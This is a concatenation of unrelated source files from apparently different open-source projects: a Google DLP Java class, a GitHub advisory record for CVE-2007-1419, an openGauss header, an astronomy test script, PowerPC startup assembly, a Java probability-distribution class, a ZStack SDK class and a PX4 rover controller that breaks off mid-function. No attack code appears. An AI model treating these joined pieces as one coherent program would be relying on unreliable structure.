* Proximity of the finding within which the entire hotword must reside. The total length of the
* window cannot exceed 1000 characters. Note that the finding itself will be included in the
* window, so that hotwords may be used to match substrings of the finding itself. For example,
* the certainty of a phone number regex "\(\d{3}\) \d{3}-\d{4}" could be adjusted upwards if the
* area code is known to be the local area code of a company office using the hotword regex
* "\(xxx\)", where "xxx" is the area code in question.
* @param proximity proximity or {@code null} for none
*/
public GooglePrivacyDlpV2HotwordRule setProximity(GooglePrivacyDlpV2Proximity proximity) {
this.proximity = proximity;
return this;
}
@Override
public GooglePrivacyDlpV2HotwordRule set(String fieldName, Object value) {
return (GooglePrivacyDlpV2HotwordRule) super.set(fieldName, value);
}
@Override
public GooglePrivacyDlpV2HotwordRule clone() {
return (GooglePrivacyDlpV2HotwordRule) super.clone();
}
}
| 1,597 |
892 | {
"schema_version": "1.2.0",
"id": "GHSA-vh8v-h2hp-7m6q",
"modified": "2022-05-01T17:53:21Z",
"published": "2022-05-01T17:53:21Z",
"aliases": [
"CVE-2007-1419"
],
"details": "The Java Management Extensions Remote API Remote Method Invocation over Internet Inter-ORB Protocol (JMX RMI-IIOP) API in Java Dynamic Management Kit 5.1 before 20070309 does not properly enforce the java.policy, which allows local users to obtain certain MBeans data access by operating a server application accessed by a privileged remote authenticated user.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2007-1419"
},
{
"type": "WEB",
"url": "http://osvdb.org/34018"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/24497"
},
{
"type": "WEB",
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102835-1"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/22907"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id?1017745"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2007/0906"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": "MODERATE",
"github_reviewed": false
}
} | 622 |
360 | <reponame>Yanci0/openGauss-server
/*--------------------------------------------------------------------
* bgworker.h
* Pluggable background workers interface
*
 * A background worker is a process that runs when creating an index for
 * redistribution; it provides a parallel bgworker framework to scan and
 * rebuild indexes in parallel.
*
* Portions Copyright (c) 2021 Huawei Technologies Co.,Ltd.
*
* IDENTIFICATION
* src/include/postmaster/bgworker.h
* --------------------------------------------------------------------
*/
#ifndef BGWORKER_H
#define BGWORKER_H
#include "access/xact.h"
#include "access/nbtree.h"
#include "utils/tuplesort.h"
#include "catalog/index.h"
/*---------------------------------------------------------------------
* External module API.
*---------------------------------------------------------------------
*/
extern int g_max_worker_processes;
#define BGWORKER_LOOP_SLEEP_TIME 10000
/* bgworker's current status duration limit, 500 * BGWORKER_LOOP_SLEEP_TIME = 5s */
#define BGWORKER_STATUS_DURLIMIT 500
#define BGWORKER_MAX_ERROR_LEN 256
typedef enum BgwHandleStatus {
BGW_NOT_YET_STARTED, /* worker hasn't been started yet */
BGW_STARTED, /* worker is running */
BGW_STOPPED, /* worker has finished work */
BGW_FAILED, /* worker has failed */
BGW_TERMINATED /* worker has exit successfully */
} BgwHandleStatus;
struct BgWorkerContext;
typedef void (*bgworker_main)(const BgWorkerContext *bwc);
typedef void (*bgworker_exit)(const BgWorkerContext *bwc);
typedef struct BgWorkerContext {
StreamTxnContext transactionCxt;
void *bgshared;
PGPROC *leader;
char *databaseName;
char *userName;
bool enable_cluster_resize;
bgworker_main main_entry;
bgworker_exit exit_entry;
} BgWorkerContext;
typedef struct BgWorkerErrorData {
int elevel;
int sqlerrcode;
char message[BGWORKER_MAX_ERROR_LEN];
char detail[BGWORKER_MAX_ERROR_LEN];
} BgWorkerErrorData;
typedef struct BackgroundWorker {
ThreadId bgw_notify_pid; /* SIGUSR1 this backend on start/stop */
BgwHandleStatus bgw_status; /* Status of this bgworker */
uint64 bgw_status_dur; /* duration in this status */
BgWorkerErrorData bgw_edata; /* error information of a bgworker */
pg_atomic_uint32 disable_count; /* indicate whether the bgworker is disabled */
slist_node rw_lnode; /* list link */
} BackgroundWorker;
typedef struct BackgroundWorkerArgs {
BgWorkerContext *bgwcontext;
BackgroundWorker *bgworker;
} BackgroundWorkerArgs;
/* Register a new bgworker during shared_preload_libraries */
extern void RegisterBackgroundWorker(BackgroundWorker *worker);
extern void LaunchBackgroundWorkers(int nworkers, void *bgshared, bgworker_main bgmain, bgworker_exit bgexit);
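/*
 * Usage sketch (illustrative only; my_worker_main, my_worker_exit and the
 * shared payload below are hypothetical):
 *
 *   static void my_worker_main(const BgWorkerContext *bwc)
 *   {
 *       MyShared *shared = (MyShared *)bwc->bgshared;
 *       // scan and rebuild one slice of the index ...
 *   }
 *   static void my_worker_exit(const BgWorkerContext *bwc) {}
 *
 *   LaunchBackgroundWorkers(nworkers, shared, my_worker_main, my_worker_exit);
 */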
extern void BackgroundWorkerMain(void);
extern bool IsBgWorkerProcess(void);
extern void BgworkerListSyncQuit();
extern void BgworkerListWaitFinish(int *nparticipants);
#endif /* BGWORKER_H */
| 1,156 |
460 | <reponame>juandesant/astrometry.net
# This file is part of the Astrometry.net suite.
# Licensed under a 3-clause BSD style license - see LICENSE
from __future__ import print_function
import matplotlib
matplotlib.use('Agg')
import pylab as plt
import sys
from astrometry.sdss.dr8 import *
import numpy as np
def test_astrans(sdss, r,c,f,b):
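    # Round-trip check of the SDSS astrometric transform: radec_to_pixel must
    # agree between the Python and C paths, and the pixel<->radec conversions
    # plotted below should overlay the photoObj positions.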
bandnum = band_index(b)
sdss.retrieve('frame', r, c, f, b)
frame = sdss.readFrame(r, c, f, b)
astrans = frame.getAsTrans()
sdss.retrieve('photoObj', r, c, f)
obj = sdss.readPhotoObj(r, c, f)
tab = obj.getTable()
#tab.about()
x,y = tab.colc[:,bandnum], tab.rowc[:,bandnum]
ra,dec = tab.ra, tab.dec
for r,d in zip(ra,dec):
print('ra,dec', r,d)
#print 'py:'
x1,y1 = astrans.radec_to_pixel_single_py(r, d)
print(' py', x1,y1)
#print 'c:'
x2,y2 = astrans.radec_to_pixel_single_c(r, d)
print(' c', x2,y2)
assert(np.abs(x1 - x2) < 1e-6)
assert(np.abs(y1 - y2) < 1e-6)
r2,d2 = astrans.pixel_to_radec(x, y)
plt.clf()
plt.plot(ra, dec, 'r.')
plt.plot(r2, d2, 'bo', mec='b', mfc='none')
plt.savefig('rd.png')
r3,d3 = [],[]
for xi,yi in zip(x,y):
ri,di = astrans.pixel_to_radec(xi, yi)
r3.append(ri)
d3.append(di)
plt.clf()
plt.plot(ra, dec, 'r.')
plt.plot(r3, d3, 'bo', mec='b', mfc='none')
plt.savefig('rd3.png')
x2,y2 = astrans.radec_to_pixel(ra, dec)
plt.clf()
plt.plot(x, y, 'r.')
plt.plot(x2, y2, 'bo', mec='b', mfc='none')
plt.savefig('xy.png')
x3,y3 = [],[]
for ri,di in zip(ra, dec):
xi,yi = astrans.radec_to_pixel(ri, di)
x3.append(xi)
y3.append(yi)
plt.clf()
plt.plot(x, y, 'r.')
plt.plot(x3, y3, 'bo', mec='b', mfc='none')
plt.savefig('xy3.png')
if __name__ == '__main__':
sdss = DR8()
#test_astrans(sdss, 4623, 1, 203, 'r')
test_astrans(sdss, 5065, 1, 68, 'r')
sys.exit(0)
fnew = sdss.readFrame(4623, 1, 203, 'r', filename='frame-r-004623-1-0203.fits')
print('fnew:', fnew)
forig = sdss.readFrame(4623, 1, 203, 'r', 'frame-r-004623-1-0203.fits.orig')
print('forig:', forig)
frame = sdss.readFrame(3712, 3, 187, 'r')
print('frame:', frame)
img = frame.getImage()
print(' image', img.shape)
fpobj = sdss.readFpObjc(6581, 2, 135)
print('fpobj:', fpobj)
fpm = sdss.readFpM(6581, 2, 135, 'i')
print('fpm:', fpm)
psf = sdss.readPsField(6581, 2, 135)
print('psfield:', psf)
| 1,366 |
1,244 | <filename>arch/powerpc/crt_arch.h
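/* _start: hand the initial stack pointer to __cstart in r3, align the stack
 * to 16 bytes, and zero the link register and frame back-chain before the
 * call. */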
__asm__("\
.global _start \n\
.type _start, %function \n\
_start: \n\
mr 3, 1 \n\
clrrwi 1, 1, 4 \n\
li 0, 0 \n\
stwu 1, -16(1) \n\
mtlr 0 \n\
stw 0, 0(1) \n\
bl __cstart \n\
");
| 134 |
364 | <reponame>xiaobing007/dagli<filename>math-distribution/src/main/java/com/linkedin/dagli/math/distribution/ArrayDiscreteDistribution.java
package com.linkedin.dagli.math.distribution;
import com.linkedin.dagli.util.array.ArraysEx;
import it.unimi.dsi.fastutil.objects.Object2DoubleMap;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.stream.Collector;
import java.util.stream.IntStream;
import java.util.stream.Stream;
/**
 * An immutable {@link DiscreteDistribution} that stores label and probability entries in space-efficient arrays.
*/
public class ArrayDiscreteDistribution<T> extends AbstractDiscreteDistribution<T> {
private static final long serialVersionUID = 1;
// entries are stored via parallel arrays rather than concrete LabelProbability objects for efficiency
private final T[] _labels; // this is an Object[] masquerading as T[]; this is safe because we never expose it outside
// this class
private final double[] _probabilities;
/**
* Gets the label of the entry in this distribution at the given index. The index refers to the position of the entry
* in order of <b>highest probability to smallest</b> (with ties broken arbitrarily). The order is consistent across
* all methods of this object and fixed (so entries that are tied in probability will not swap positions).
*
* @return the label of the requested entry
*/
public T getLabelByIndex(int index) {
return _labels[index];
}
/**
 * Gets the probability of the entry in this distribution at the given index. The index refers to the position of the entry
* in order of <b>highest probability to smallest</b> (with ties broken arbitrarily). The order is consistent across
* all methods of this object and fixed (so entries that are tied in probability will not swap positions).
*
* @return the probability of the requested entry
*/
public double getProbabilityByIndex(int index) {
return _probabilities[index];
}
/**
* Gets a collector that can be used to create a ArrayDiscreteDistribution from a stream, e.g.
* someDistribution.stream().doSomething().collect(ArrayDiscreteDistribution.collector());
*
* @param <T> the type of the label
* @return a collector that can be used to create a ArrayDiscreteDistribution from a stream
*/
public static <T> Collector<LabelProbability<T>, ?, ArrayDiscreteDistribution<T>> collector() {
return Collector.<LabelProbability<T>, ArrayList<LabelProbability<T>>, ArrayDiscreteDistribution<T>>of(
ArrayList::new, ArrayList::add, (l1, l2) -> {
l1.addAll(l2);
return l1;
}, ArrayDiscreteDistribution::new);
}
/**
* Creates a new ArrayDiscreteDistribution from a collection of LabelProbability entries. This collection should not
* contain duplicate labels.
*
* @param entryList The entries for the distribution. Each entry should have a distinct label.
*/
@SuppressWarnings("unchecked") // masquerading Object[] as T[] is safe because it's never exposed outside the class
public ArrayDiscreteDistribution(Collection<LabelProbability<T>> entryList) {
this((T[]) entryList.stream().map(LabelProbability::getLabel).toArray(),
entryList.stream().mapToDouble(LabelProbability::getProbability).toArray(), null);
}
/**
* Creates a new ArrayDiscreteDistribution from parallel arrays of labels and probabilities. "Parallel" arrays
* means that the entry at a particular index in one array corresponds with the element at that index in the other.
*
* The provided arrays are copied; the new distribution does not modify or take ownership of them.
*
* @param labels the array of (distinct) labels; it's safe to pass an Object[] masquerading as T[]
* @param probabilities the array of probabilities
*/
public ArrayDiscreteDistribution(T[] labels, double[] probabilities) {
this(labels.clone(), probabilities.clone(), null);
}
/**
* Creates a new ArrayDiscreteDistribution from a map of labels to probabilities.
*
* @param labelToProbabilityMap the map of labels to probabilities
*/
public ArrayDiscreteDistribution(Object2DoubleMap<T> labelToProbabilityMap) {
this(getArraysFromMap(labelToProbabilityMap));
}
/**
* Simple container class for storing an array of labels and its corresponding array of probabilities.
*
* @param <T> the type of the label
*/
private static class LabelAndProbabilityArrays<T> {
/**
* The array of labels.
*/
T[] _labels;
/**
* The array of probabilities.
*/
double[] _probabilities;
/**
 * Creates a new instance with the specified labels and probabilities.
*
* @param labels the array of labels
* @param probabilities the array of probabilities
*/
LabelAndProbabilityArrays(T[] labels, double[] probabilities) {
_labels = labels;
_probabilities = probabilities;
}
}
/**
* Extracts the labels and probabilities from a map as parallel arrays and packs them in a LabelAndProbabilityArrays
* object. This method is required because of the constraints Java places on constructor chaining.
*
* @param labelToProbabilityMap a map from labels to their probabilities
* @param <T> the type of the labels
* @return a LabelAndProbabilityArrays containing the arrays of labels and probabilities
*/
@SuppressWarnings("unchecked") // masquerading Object[] as T[] is safe here because it will never be exposed outside
// this class
private static <T> LabelAndProbabilityArrays<T> getArraysFromMap(Object2DoubleMap<T> labelToProbabilityMap) {
// if the labelToProbabilityMap is of type Object2DoubleFixedArrayMap, it's very cheap to pull out its underlying
// arrays:
if (labelToProbabilityMap instanceof Object2DoubleFixedArrayMap) {
return new LabelAndProbabilityArrays<>(((Object2DoubleFixedArrayMap<T>) labelToProbabilityMap).getKeyArray(),
((Object2DoubleFixedArrayMap<T>) labelToProbabilityMap).getValueArray());
}
// otherwise, we need to something a bit more generic:
T[] labels = (T[]) new Object[labelToProbabilityMap.size()]; // masquerading Object[] as T[]
double[] probabilities = new double[labelToProbabilityMap.size()];
int offset = 0;
// copy labels and probabilities into parallel arrays
for (Object2DoubleMap.Entry<T> entry : labelToProbabilityMap.object2DoubleEntrySet()) {
labels[offset] = entry.getKey();
probabilities[offset] = entry.getDoubleValue();
offset++;
}
return new LabelAndProbabilityArrays<>(labels, probabilities);
}
/**
* Constructor that unpacks a LabelAndProbabilityArrays object and passes the result to the "real" constructor,
* assuming ownership of the arrays therein.
*
* This "extra" constructor is needed because of the constraints Java places upon constructor chaining.
*
* @param labelAndProbabilityArrays a container containing the label and probability parallel arrays
*/
private ArrayDiscreteDistribution(LabelAndProbabilityArrays<T> labelAndProbabilityArrays) {
this(labelAndProbabilityArrays._labels, labelAndProbabilityArrays._probabilities, null);
}
/**
* Creates a new ArrayDiscreteDistribution from parallel arrays of labels and probabilities. "Parallel" arrays
* means that the entry at a particular index in one array corresponds with the element at that index in the other.
*
* <strong>This method takes ownership of the provided arrays and may modify them.</strong> The arrays should not be
* changed after they have passed to this method. The advantage of this method over the
* {@link #ArrayDiscreteDistribution(Object[], double[])} constructor is that it is more efficient due to fewer array
* copies required.
*
* @param labels the array of (distinct) labels; it's safe to pass an Object[] masquerading as a T[]
* @param probabilities the array of probabilities
*/
public static <T> ArrayDiscreteDistribution<T> wrap(T[] labels, double[] probabilities) {
return new ArrayDiscreteDistribution<>(labels, probabilities, null);
}
/**
* Creates a new ArrayDiscreteDistribution from parallel arrays of labels and probabilities. "Parallel" arrays
* means that the entry at a particular index in one array corresponds with the element at that index in the other.
*
* <b>Note:</b> this method takes ownership of the provided arrays and may modify them. The arrays should not be
* changed after they have passed to this method.
*
* @param labels the array of (distinct) labels
* @param probabilities the array of probabilities
* @param dummyArg an unused argument used to differentiate this constructor from another, otherwise identical one
*/
private ArrayDiscreteDistribution(T[] labels, double[] probabilities, Void dummyArg) {
// check the validity of our inputs with asserts
assert Arrays.stream(labels).distinct().count() == labels.length; // all labels unique?
assert Arrays.stream(probabilities).noneMatch(p -> p < 0); // no negative probabilities
// this argument check is cheap enough to do every time
if (labels.length != probabilities.length) {
throw new IllegalArgumentException(
"Length of labels array, " + labels.length + ", does not match the length of the probabilities array, "
+ probabilities.length);
}
// if the items in the list are not already in reverse order (highest probability to lowest), sort them
if (!ArraysEx.isMonotonicallyDecreasing(probabilities)) {
ArraysEx.sort(probabilities, labels);
ArraysEx.reverse(probabilities);
ArraysEx.reverse(labels);
}
// eliminate 0-probability events, if any
int firstZeroIndex = firstZeroIndexInReverseSortedProbabilityArray(probabilities);
if (firstZeroIndex < probabilities.length) {
// we have at least one 0-probability event
probabilities = Arrays.copyOf(probabilities, firstZeroIndex);
labels = Arrays.copyOf(labels, firstZeroIndex);
}
_probabilities = probabilities;
_labels = labels;
}
/**
* Finds the offset of the first zero in a reverse-sorted (largest to smallest) array of non-negative, finite values.
*
* If the array contains no zeros, the return value is the length of the passed array.
*
* @param probabilities the reverse-sorted array of non-negative, finite doubles to scan
* @return the offset of the first zero in the array, or the length of the array if it contains no zeros.
*/
private static int firstZeroIndexInReverseSortedProbabilityArray(double[] probabilities) {
// scan backwards, looking for the first non-zero entry
for (int i = probabilities.length - 1; i >= 0; i--) {
if (probabilities[i] != 0) {
return i + 1; // i is the offset of the last non-zero; therefore i + 1 is the offset of the first zero
}
}
return 0; // the array is all zeros (or zero-length)
}
/**
* Private no-args constructor specifically for the benefit of Kryo
*/
private ArrayDiscreteDistribution() {
// These values will be overwritten by Kryo. Final does not stop Kryo from modifying a field when loading an
// object.
_probabilities = null;
_labels = null;
}
@Override
public long size64() {
return _labels.length;
}
@Override
public Stream<LabelProbability<T>> stream() {
return IntStream.range(0, _labels.length)
.mapToObj(index -> new LabelProbability<>(_labels[index], _probabilities[index]));
}
}
| 3,547 |
879 | <filename>sdk/src/main/java/org/zstack/sdk/VolumeBackupStorageRefInventory.java
package org.zstack.sdk;
public class VolumeBackupStorageRefInventory {
public java.lang.String volumeBackupUuid;
public void setVolumeBackupUuid(java.lang.String volumeBackupUuid) {
this.volumeBackupUuid = volumeBackupUuid;
}
public java.lang.String getVolumeBackupUuid() {
return this.volumeBackupUuid;
}
public java.lang.String backupStorageUuid;
public void setBackupStorageUuid(java.lang.String backupStorageUuid) {
this.backupStorageUuid = backupStorageUuid;
}
public java.lang.String getBackupStorageUuid() {
return this.backupStorageUuid;
}
public java.lang.String installPath;
public void setInstallPath(java.lang.String installPath) {
this.installPath = installPath;
}
public java.lang.String getInstallPath() {
return this.installPath;
}
public java.lang.String status;
public void setStatus(java.lang.String status) {
this.status = status;
}
public java.lang.String getStatus() {
return this.status;
}
public java.sql.Timestamp createDate;
public void setCreateDate(java.sql.Timestamp createDate) {
this.createDate = createDate;
}
public java.sql.Timestamp getCreateDate() {
return this.createDate;
}
public java.sql.Timestamp lastOpDate;
public void setLastOpDate(java.sql.Timestamp lastOpDate) {
this.lastOpDate = lastOpDate;
}
public java.sql.Timestamp getLastOpDate() {
return this.lastOpDate;
}
}
| 624 |
1,537 | /****************************************************************************
*
* Copyright (c) 2017, 2021 PX4 Development Team. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
* 3. Neither the name PX4 nor the names of its contributors may be
* used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
****************************************************************************/
/**
*
* This module is a modification of the fixed wing module and it is designed for ground rovers.
* It has been developed starting from the fw module, simplified and improved with dedicated items.
*
* All the acknowledgments and credits for the fw wing app are reported in those files.
*
* @author <NAME> <<EMAIL>>
*/
#include "RoverPositionControl.hpp"
#include <lib/geo/geo.h>
#define ACTUATOR_PUBLISH_PERIOD_MS 4
using namespace matrix;
/**
* L1 control app start / stop handling function
*
* @ingroup apps
*/
extern "C" __EXPORT int rover_pos_control_main(int argc, char *argv[]);
RoverPositionControl::RoverPositionControl() :
ModuleParams(nullptr),
WorkItem(MODULE_NAME, px4::wq_configurations::nav_and_controllers),
/* performance counters */
_loop_perf(perf_alloc(PC_ELAPSED, MODULE_NAME": cycle")) // TODO : do we even need these perf counters
{
}
RoverPositionControl::~RoverPositionControl()
{
perf_free(_loop_perf);
}
bool
RoverPositionControl::init()
{
if (!_vehicle_angular_velocity_sub.registerCallback()) {
PX4_ERR("vehicle angular velocity callback registration failed!");
return false;
}
return true;
}
void RoverPositionControl::parameters_update(bool force)
{
// check for parameter updates
if (_parameter_update_sub.updated() || force) {
// clear update
parameter_update_s pupdate;
_parameter_update_sub.copy(&pupdate);
// update parameters from storage
updateParams();
_gnd_control.set_l1_damping(_param_l1_damping.get());
_gnd_control.set_l1_period(_param_l1_period.get());
_gnd_control.set_l1_roll_limit(math::radians(0.0f));
pid_init(&_speed_ctrl, PID_MODE_DERIVATIV_CALC, 0.01f);
pid_set_parameters(&_speed_ctrl,
_param_speed_p.get(),
_param_speed_i.get(),
_param_speed_d.get(),
_param_speed_imax.get(),
_param_gndspeed_max.get());
}
}
void
RoverPositionControl::vehicle_control_mode_poll()
{
if (_control_mode_sub.updated()) {
_control_mode_sub.copy(&_control_mode);
}
}
void
RoverPositionControl::manual_control_setpoint_poll()
{
if (_control_mode.flag_control_manual_enabled) {
if (_manual_control_setpoint_sub.copy(&_manual_control_setpoint)) {
float dt = math::constrain(hrt_elapsed_time(&_manual_setpoint_last_called) * 1e-6f, 0.0002f, 0.04f);
if (!_control_mode.flag_control_climb_rate_enabled &&
!_control_mode.flag_control_offboard_enabled) {
if (_control_mode.flag_control_attitude_enabled) {
// STABILIZED mode generate the attitude setpoint from manual user inputs
_att_sp.roll_body = 0.0;
_att_sp.pitch_body = 0.0;
/* reset yaw setpoint to current position if needed */
if (_reset_yaw_sp) {
const float vehicle_yaw = Eulerf(Quatf(_vehicle_att.q)).psi();
_manual_yaw_sp = vehicle_yaw;
_reset_yaw_sp = false;
} else {
const float yaw_rate = math::radians(_param_gnd_man_y_max.get());
_att_sp.yaw_sp_move_rate = _manual_control_setpoint.y * yaw_rate;
_manual_yaw_sp = wrap_pi(_manual_yaw_sp + _att_sp.yaw_sp_move_rate * dt);
}
_att_sp.yaw_body = _manual_yaw_sp;
_att_sp.thrust_body[0] = _manual_control_setpoint.z;
Quatf q(Eulerf(_att_sp.roll_body, _att_sp.pitch_body, _att_sp.yaw_body));
q.copyTo(_att_sp.q_d);
_att_sp.timestamp = hrt_absolute_time();
_attitude_sp_pub.publish(_att_sp);
} else {
_act_controls.control[actuator_controls_s::INDEX_ROLL] = 0.0f; // Nominally roll: _manual_control_setpoint.y;
_act_controls.control[actuator_controls_s::INDEX_PITCH] = 0.0f; // Nominally pitch: -_manual_control_setpoint.x;
// Set heading from the manual roll input channel
_act_controls.control[actuator_controls_s::INDEX_YAW] =
_manual_control_setpoint.y; // Nominally yaw: _manual_control_setpoint.r;
// Set throttle from the manual throttle channel
_act_controls.control[actuator_controls_s::INDEX_THROTTLE] = _manual_control_setpoint.z;
_reset_yaw_sp = true;
}
} else {
_reset_yaw_sp = true;
}
_manual_setpoint_last_called = hrt_absolute_time();
}
}
}
void
RoverPositionControl::position_setpoint_triplet_poll()
{
if (_pos_sp_triplet_sub.updated()) {
_pos_sp_triplet_sub.copy(&_pos_sp_triplet);
}
}
void
RoverPositionControl::attitude_setpoint_poll()
{
if (_att_sp_sub.updated()) {
_att_sp_sub.copy(&_att_sp);
}
}
void
RoverPositionControl::vehicle_attitude_poll()
{
if (_att_sub.updated()) {
_att_sub.copy(&_vehicle_att);
}
}
bool
RoverPositionControl::control_position(const matrix::Vector2d ¤t_position,
const matrix::Vector3f &ground_speed, const position_setpoint_triplet_s &pos_sp_triplet)
{
	float dt = 0.01f; // Use a non-zero value to avoid division by zero
if (_control_position_last_called > 0) {
dt = hrt_elapsed_time(&_control_position_last_called) * 1e-6f;
}
_control_position_last_called = hrt_absolute_time();
bool setpoint = true;
if ((_control_mode.flag_control_auto_enabled ||
_control_mode.flag_control_offboard_enabled) && pos_sp_triplet.current.valid) {
/* AUTONOMOUS FLIGHT */
_control_mode_current = UGV_POSCTRL_MODE_AUTO;
/* get circle mode */
//bool was_circle_mode = _gnd_control.circle_mode();
/* current waypoint (the one currently heading for) */
matrix::Vector2d curr_wp(pos_sp_triplet.current.lat, pos_sp_triplet.current.lon);
/* previous waypoint */
matrix::Vector2d prev_wp = curr_wp;
if (pos_sp_triplet.previous.valid) {
prev_wp(0) = pos_sp_triplet.previous.lat;
prev_wp(1) = pos_sp_triplet.previous.lon;
}
matrix::Vector2f ground_speed_2d(ground_speed);
float mission_throttle = _param_throttle_cruise.get();
/* Just control the throttle */
if (_param_speed_control_mode.get() == 1) {
/* control the speed in closed loop */
float mission_target_speed = _param_gndspeed_trim.get();
if (PX4_ISFINITE(_pos_sp_triplet.current.cruising_speed) &&
_pos_sp_triplet.current.cruising_speed > 0.1f) {
mission_target_speed = _pos_sp_triplet.current.cruising_speed;
}
// Velocity in body frame
const Dcmf R_to_body(Quatf(_vehicle_att.q).inversed());
const Vector3f vel = R_to_body * Vector3f(ground_speed(0), ground_speed(1), ground_speed(2));
const float x_vel = vel(0);
const float x_acc = _vehicle_acceleration_sub.get().xyz[0];
// Compute airspeed control out and just scale it as a constant
mission_throttle = _param_throttle_speed_scaler.get()
* pid_calculate(&_speed_ctrl, mission_target_speed, x_vel, x_acc, dt);
// Constrain throttle between min and max
mission_throttle = math::constrain(mission_throttle, _param_throttle_min.get(), _param_throttle_max.get());
} else {
/* Just control throttle in open loop */
if (PX4_ISFINITE(_pos_sp_triplet.current.cruising_throttle) &&
_pos_sp_triplet.current.cruising_throttle > 0.01f) {
mission_throttle = _pos_sp_triplet.current.cruising_throttle;
}
}
float dist_target = get_distance_to_next_waypoint(_global_pos.lat, _global_pos.lon,
(double)curr_wp(0), (double)curr_wp(1)); // pos_sp_triplet.current.lat, pos_sp_triplet.current.lon);
//PX4_INFO("Setpoint type %d", (int) pos_sp_triplet.current.type );
//PX4_INFO(" State machine state %d", (int) _pos_ctrl_state);
//PX4_INFO(" Setpoint Lat %f, Lon %f", (double) curr_wp(0), (double)curr_wp(1));
//PX4_INFO(" Distance to target %f", (double) dist_target);
switch (_pos_ctrl_state) {
case GOTO_WAYPOINT: {
if (dist_target < _param_nav_loiter_rad.get()) {
_pos_ctrl_state = STOPPING; // We are closer than loiter radius to waypoint, stop.
} else {
_gnd_control.navigate_waypoints(prev_wp, curr_wp, current_position, ground_speed_2d);
_act_controls.control[actuator_controls_s::INDEX_THROTTLE] = mission_throttle;
float desired_r = ground_speed_2d.norm_squared() / math::abs_t(_gnd_control.nav_lateral_acceleration_demand());
float desired_theta = (0.5f * M_PI_F) - atan2f(desired_r, _param_wheel_base.get());
float control_effort = (desired_theta / _param_max_turn_angle.get()) * sign(
_gnd_control.nav_lateral_acceleration_demand());
control_effort = math::constrain(control_effort, -1.0f, 1.0f);
_act_controls.control[actuator_controls_s::INDEX_YAW] = control_effort;
}
}
break;
case STOPPING: {
_act_controls.control[actuator_controls_s::INDEX_YAW] = 0.0f;
_act_controls.control[actuator_controls_s::INDEX_THROTTLE] = 0.0f;
// Note _prev_wp is different to the local prev_wp which is related to a mission waypoint.
float dist_between_waypoints = get_distance_to_next_waypoint((double)_prev_wp(0), (double)_prev_wp(1),
(double)curr_wp(0), (double)curr_wp(1));
if (dist_between_waypoints > 0) {
_pos_ctrl_state = GOTO_WAYPOINT; // A new waypoint has arrived go to it
}
//PX4_INFO(" Distance between prev and curr waypoints %f", (double)dist_between_waypoints);
}
break;
default:
PX4_ERR("Unknown Rover State");
_pos_ctrl_state = STOPPING;
break;
}
_prev_wp = curr_wp;
} else {
_control_mode_current = UGV_POSCTRL_MODE_OTHER;
setpoint = false;
}
return setpoint;
}
void
RoverPositionControl::control_velocity(const matrix::Vector3f ¤t_velocity)
{
const Vector3f desired_velocity{_trajectory_setpoint.vx, _trajectory_setpoint.vy, _trajectory_setpoint.vz};
	float dt = 0.01f; // Use a non-zero value to avoid division by zero
const float mission_throttle = _param_throttle_cruise.get();
const float desired_speed = desired_velocity.norm();
if (desired_speed > 0.01f) {
const Dcmf R_to_body(Quatf(_vehicle_att.q).inversed());
const Vector3f vel = R_to_body * Vector3f(current_velocity(0), current_velocity(1), current_velocity(2));
const float x_vel = vel(0);
const float x_acc = _vehicle_acceleration_sub.get().xyz[0];
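		// x_vel and x_acc are forward speed and acceleration in the body frame;
		// the PID below closes the loop on forward speed only.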
const float control_throttle = pid_calculate(&_speed_ctrl, desired_speed, x_vel, x_acc, dt);
//Constrain maximum throttle to mission throttle
_act_controls.control[actuator_controls_s::INDEX_THROTTLE] = math::constrain(control_throttle, 0.0f, mission_throttle);
Vector3f desired_body_velocity;
if (_velocity_frame == VelocityFrame::NED) {
desired_body_velocity = desired_velocity;
} else {
// If the frame of the velocity setpoint is unknown, assume it is in local frame
desired_body_velocity = R_to_body * desired_velocity;
}
const float desired_theta = atan2f(desired_body_velocity(1), desired_body_velocity(0));
float control_effort = desired_theta / _param_max_turn_angle.get();
control_effort = math::constrain(control_effort, -1.0f, 1.0f);
_act_controls.control[actuator_controls_s::INDEX_YAW] = control_effort;
} else {
_act_controls.control[actuator_controls_s::INDEX_THROTTLE] = 0.0f;
_act_controls.control[actuator_controls_s::INDEX_YAW] = 0.0f;
}
}
void
RoverPositionControl::control_attitude(const vehicle_attitude_s &att, const vehicle_attitude_setpoint_s &att_sp)
{
// quaternion attitude control law, qe is rotation from q to qd
const Quatf qe = Quatf(att.q).inversed() * Quatf(att_sp.q_d);
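	// The yaw component of qe (euler_sp(2)) is the heading error; it is
	// normalized by the maximum turn angle to form the steering effort.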
const Eulerf euler_sp = qe;
